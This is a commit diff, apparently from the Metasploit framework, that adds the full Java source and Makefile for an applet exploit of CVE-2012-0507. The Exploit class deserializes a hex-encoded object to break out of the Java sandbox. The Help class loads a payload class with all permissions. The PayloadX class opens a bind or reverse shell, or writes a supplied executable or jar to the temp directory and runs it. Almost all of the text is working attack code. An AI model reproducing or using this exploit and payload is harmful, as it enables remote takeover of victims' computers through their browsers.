Make building the jar for cve-2012-0507 a bit easier

Mostly stolen from cve-2008-5353

external/source/exploits/CVE-2012-0507/Makefile

@@ -1,23 +1,15 @@
-JAR = CVE-2012-0507.jar
+JAR_FILE = CVE-2012-0507.jar
 
-CLASSES = \
-	msf/x/Exploit.java  \
-	msf/x/Help.java     \
-	msf/x/PayloadX.java 
+all: ${JAR_FILE}
 
+${JAR_FILE}: src/a/Exploit.java src/a/Help.java  src/msf/x/PayloadX.java
+	javac -d bin -target 1.2 -source 1.2 src/a/*.java src/msf/x/*.java && (cd bin; jar cvf ../${JAR_FILE} `find . -name *.class`)
 
-.SUFFIXES: .java .class
-.java.class:
-	javac -d bin -source 1.2 -target 1.2 $*.java
-
-all: $(CLASSES:.java=.class)
-	(cd bin; jar cvf ../$(JAR) *)
-
-install:
-	mv $(JAR) ../../../../data/exploits/
+install: all
+	mv ${JAR_FILE} ../../../../data/exploits/
 
 clean:
-	rm -f $(JAR)
-	rm -rf bin/*
+	rm -f ${JAR_FILE}
+	find bin -name '*.class' -print0 | xargs -0 rm -f
 
 

external/source/exploits/CVE-2012-0507/bin/msf/x/PayloadX.java

@@ -0,0 +1,191 @@
+package msf.x;
+
+import java.io.BufferedReader;
+import java.io.BufferedWriter;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.InputStream;
+import java.io.InputStreamReader;
+import java.io.OutputStream;
+import java.io.OutputStreamWriter;
+import java.net.ServerSocket;
+import java.net.Socket;
+import java.security.AccessController;
+import java.security.PrivilegedExceptionAction;
+
+public class PayloadX implements PrivilegedExceptionAction
+{
+	// This will contain a hex string of the native payload to drop and execute.
+	public static String data = null;
+	public static String jar = null;
+	// If no native payload is set we get either a java bind shell or a java
+	// reverse shell.
+	public static String lhost = null;
+	public static int lport = 4444;
+
+	class StreamConnector extends Thread
+	{
+		InputStream is;
+		OutputStream os;
+
+		StreamConnector( InputStream is, OutputStream os )
+		{
+			this.is = is;
+			this.os = os;
+		}
+
+		public void run()
+		{
+			BufferedReader in = null;
+			BufferedWriter out = null;
+
+			try
+			{
+				in = new BufferedReader( new InputStreamReader( is ) );
+				out = new BufferedWriter( new OutputStreamWriter( os ) );
+				char buffer[] = new char[8192];
+				int length;
+				while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
+				{
+					out.write( buffer, 0, length );
+					out.flush();
+				}
+			}
+			catch( Exception e ) {}
+
+			try
+			{
+				if( in != null )
+					in.close();
+				if( out != null )
+					out.close();
+			}
+			catch( Exception e ) {}
+		}
+	}
+
+	// http://stackoverflow.com/questions/140131/convert-a-string-representation-of-a-hex-dump-to-a-byte-array-using-java
+	public static byte[] StringToBytes( String s )
+	{
+		byte[] data = new byte[s.length() / 2];
+
+		for( int i = 0 ; i < s.length() ; i += 2 )
+			data[i / 2] = (byte)( ( Character.digit( s.charAt( i ), 16 ) << 4 ) + Character.digit( s.charAt( i + 1 ), 16 ) );
+
+		return data;
+	}
+
+	public Object run() throws Exception
+	{
+		//System.out.println("Running");
+		// if the native payload data has not been set just return for now, it
+		// will be set by the next time we reach here.
+		if( PayloadX.data == null && PayloadX.jar == null )
+			return null;
+		//System.out.println("have either data or jar");
+
+		try
+		{
+			String os = System.getProperty( "os.name" );
+
+			//System.out.println("OS: " + os);
+			// if we have no native payload to drop and execute we default to
+			// either a TCP bind or reverse shell.
+			if( PayloadX.data.length() == 0 && PayloadX.jar.length() == 0 )
+			{
+				//System.out.println("no, exe/jar. Doing shell");
+				Socket client_socket = null;
+
+				String shell = "/bin/sh";
+
+				if( os.indexOf( "Windows" ) >= 0 )
+					shell = "cmd.exe";
+
+				if( PayloadX.lhost == null )
+				{
+					ServerSocket server_socket = new ServerSocket( PayloadX.lport );
+					client_socket = server_socket.accept();
+				}
+				else
+				{
+					client_socket = new Socket( PayloadX.lhost, PayloadX.lport );
+				}
+
+				if( client_socket != null )
+				{
+					Process process = exec( shell );
+					if( process != null )
+					{
+						( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start();
+						( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start();
+					}
+				}
+			}
+			else if( PayloadX.jar != null && (PayloadX.jar.length() != 0) )
+			{
+				//System.out.println("Dropping JAR");
+				String path = System.getProperty( "java.io.tmpdir" ) + File.separator + Math.random() + ".jar";
+
+				writeFile( path, StringToBytes( PayloadX.jar ) );
+				exec( "java -jar " + path + " " + PayloadX.lhost + " " + PayloadX.lport + " true");
+			}
+			else
+			{
+				//System.out.println("Dropping EXE");
+				String path = System.getProperty( "java.io.tmpdir" ) + File.separator + Math.random() + ".exe";
+
+				writeFile( path, StringToBytes( PayloadX.data ) );
+				if( os.indexOf( "Windows" ) < 0 )
+				{
+					exec( "chmod 755 " + path );
+				}
+				exec( path );
+				new File( path ).delete();
+			}
+		}
+		catch( Exception e ) {
+			//System.out.println(e);
+		}
+
+		return null;
+	}
+
+	public Process exec( String path )
+	{
+		Process p = null;
+		//System.out.println( "Executing" );
+		try {
+			p = Runtime.getRuntime().exec( path );
+			if( p == null ) 
+			{
+				//System.out.println( "Null process, crap" ); 
+			}
+			p.waitFor();
+		} catch( Exception e ) {
+			//System.out.println(e);
+		}
+		return p;
+	}
+
+	public void writeFile( String path, byte[] data )
+	{
+		//System.out.println( "Writing file" );
+		try {
+			FileOutputStream fos = new FileOutputStream( path );
+
+			fos.write( data );
+			fos.close();
+		} catch( Exception e ) {
+			//System.out.println(e);
+		}
+	}
+
+	public PayloadX()
+	{
+		try
+		{
+			AccessController.doPrivileged( this );
+		}
+		catch( Exception e ) {}
+	}
+}

external/source/exploits/CVE-2012-0507/src/a/Exploit.java

@@ -0,0 +1,58 @@
+package a;
+
+import java.applet.Applet;
+import java.io.ByteArrayInputStream;
+import java.io.ObjectInputStream;
+import java.util.concurrent.atomic.AtomicReferenceArray;
+import a.*;
+
+// Referenced classes of package a:
+//			  Help
+
+public class Exploit extends Applet
+{
+
+	public Exploit()
+	{
+	}
+
+	public static byte[] StringToBytes(String s)
+	{
+		byte abyte0[] = new byte[s.length() / 2];
+		for(int i = 0; i < s.length(); i += 2)
+			abyte0[i / 2] = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16));
+
+		return abyte0;
+	}
+
+	public void init()
+	{
+		try
+		{
+			String as[] = {
+				"ACED0005757200135B4C6A6176612E6C616E672E4F62", "6A6563743B90CE589F1073296C020000787000000002", "757200095B4C612E48656C703BFE2C941188B6E5FF02", "000078700000000170737200306A6176612E7574696C", "2E636F6E63757272656E742E61746F6D69632E41746F", "6D69635265666572656E63654172726179A9D2DEA1BE", "65600C0200015B000561727261797400135B4C6A6176", "612F6C616E672F4F626A6563743B787071007E0003" 
+			};
+			StringBuilder stringbuilder = new StringBuilder();
+			for(int i = 0; i < as.length; i++)
+				stringbuilder.append(as[i]);
+
+			ObjectInputStream objectinputstream = new ObjectInputStream(new ByteArrayInputStream(StringToBytes(stringbuilder.toString())));
+			Object aobj[] = (Object[])(Object[])objectinputstream.readObject();
+			Help ahelp[] = (Help[])(Help[])aobj[0];
+			AtomicReferenceArray atomicreferencearray = (AtomicReferenceArray)aobj[1];
+			ClassLoader classloader = getClass().getClassLoader();
+			atomicreferencearray.set(0, classloader);
+			Help _tmp = ahelp[0];
+
+			String data  = getParameter( "data" );
+			String jar   = getParameter( "jar" );
+			String lhost = getParameter( "lhost" );
+			String lport = getParameter( "lport" );	
+			System.out.println("go go go");
+			Help.doWork(ahelp[0], this, data, jar, lhost, ( lport == null ? 4444 : Integer.parseInt( lport ) ));
+		}
+		catch(Exception exception) { 
+			System.out.println(exception.getMessage());
+		}
+	}
+}

external/source/exploits/CVE-2012-0507/src/a/Help.java

@@ -0,0 +1,82 @@
+package a;
+
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import java.io.Serializable;
+import java.net.URL;
+import java.security.AllPermission;
+import java.security.CodeSource;
+import java.security.Permissions;
+import java.security.ProtectionDomain;
+import java.security.cert.Certificate;
+import java.lang.reflect.Field;
+
+public class Help extends ClassLoader implements Serializable{
+	public static void doWork(Help h, Exploit expl, String data, String jar, String lhost, int lport) {
+
+		String classNames[] = { "msf.x.PayloadX$StreamConnector", "msf.x.PayloadX" };
+		String classPaths[] = { "/msf/x/PayloadX$StreamConnector.class", "/msf/x/PayloadX.class" };
+		Class cls = null;
+
+		try
+		{
+			for( int index=0 ; index<classNames.length ; index++ )
+			{
+
+				ByteArrayOutputStream bos = new ByteArrayOutputStream();
+				byte[] buffer = new byte[8192];
+				int length;
+
+				// read in the class file from the jar
+				InputStream is = expl.getClass().getResourceAsStream( classPaths[index] );
+				// and write it out to the byte array stream
+				while( ( length = is.read( buffer ) ) > 0 )
+					bos.write( buffer, 0, length );
+				// convert it to a simple byte array
+				buffer = bos.toByteArray();
+
+				URL url = new URL( "file:///" );
+
+				Certificate[] certs = new Certificate[0];
+
+				Permissions perm = new Permissions();
+				perm.add( new AllPermission() );
+
+				ProtectionDomain pd = new ProtectionDomain( new CodeSource( url, certs ), perm );
+
+				cls = h.defineClass( classNames[index], buffer, 0, buffer.length, pd );
+				Class class_cls = cls.getClass();  
+				System.out.println("The type of the object is: " + class_cls.getName());  
+			}
+
+			// cls will end up being the PayloadX class
+			if( cls != null )
+			{
+				// reflect into the PayloadX class to get these three fields
+				Field payload_data  = cls.getField( "data" );
+				Field payload_jar   = cls.getField( "jar" );
+				Field payload_lhost = cls.getField( "lhost" );
+				Field payload_lport = cls.getField( "lport" );
+
+				// instantiate the PayloadX object once so as we can set the native payload data
+				Object obj = cls.newInstance();
+
+				// set the native payload data, lhost and lport
+				payload_data.set( obj, data );
+				payload_jar.set( obj, jar );
+				payload_lhost.set( obj, lhost );
+				payload_lport.setInt( obj, lport );
+
+				// instantiate a second PayloadX object to perform the actual payload 
+				obj = cls.newInstance();
+			}
+		}
+		catch( Exception e ) {
+			System.out.println(e.getMessage());
+		}		
+	}
+}
+